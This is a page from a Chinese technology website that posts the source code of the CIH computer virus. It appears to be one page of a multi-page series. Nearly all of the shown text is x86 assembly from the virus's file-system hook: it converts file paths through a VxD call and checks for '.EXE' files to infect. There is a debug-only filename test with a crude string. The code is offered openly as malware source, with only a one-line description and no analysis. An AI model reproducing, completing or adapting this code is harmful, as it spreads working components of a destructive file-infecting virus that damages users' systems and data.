豆豆网 > 技术应用 > 安全技术 > 杀毒技术 > 病毒理论 > 正文

CIH源代码

http://tech.ddvip.com 2006年04月03日社区交流收藏本文

关键字： SRENG 后门病毒磁碟机 ARP Byshell PSW.Win32

本文详细介绍CIH源代码

　　; mov esi, offset FileNameBuffer
add esi, FileNameBuffer-@6

　　push esi

　　mov al, [ebx+04h]
cmp al, 0ffh
je CallUniToBCSPath

　　add al, 40h
mov ah, ':'

　　mov [esi], eax

　　inc esi
inc esi

　　; *************************************
; * UniToBCSPath *
; *************************************
; * This Service Converts *
; * a Canonicalized Unicode Pathname *
; * to a Normal Pathname in the *
; * Specified BCS Character Set. *
; *************************************

　　CallUniToBCSPath:
push 00000000h
push FileNameBufferSize
mov ebx, [ebx+10h]
mov eax, [ebx+0ch]
add eax, 04h
push eax
push esi
int 20h ; VXDCall UniToBCSPath
UniToBCSPath = $
dd 00400041h
add esp, 04h*04h

　　; *************************************
; * Is FileName '.EXE' !? *
; *************************************

　　; cmp [esi+eax-04h], '.EXE'
cmp [esi+eax-04h], 'EXE.'
pop esi
jne DisableOnBusy

　　IF DEBUG

　　; *************************************
; * Only for Debug *
; *************************************

　　; cmp [esi+eax-06h], 'FUCK'
cmp [esi+eax-06h], 'KCUF'
jne DisableOnBusy

　　ENDIF

　　; *************************************
; * Is Open Existing File !? *
; *************************************

上一页 4 5 6 789 10 11 12 13 下一页

责编：豆豆技术应用

点击发表评论

正在加载评论...

杀毒技术分类

杀毒技术专题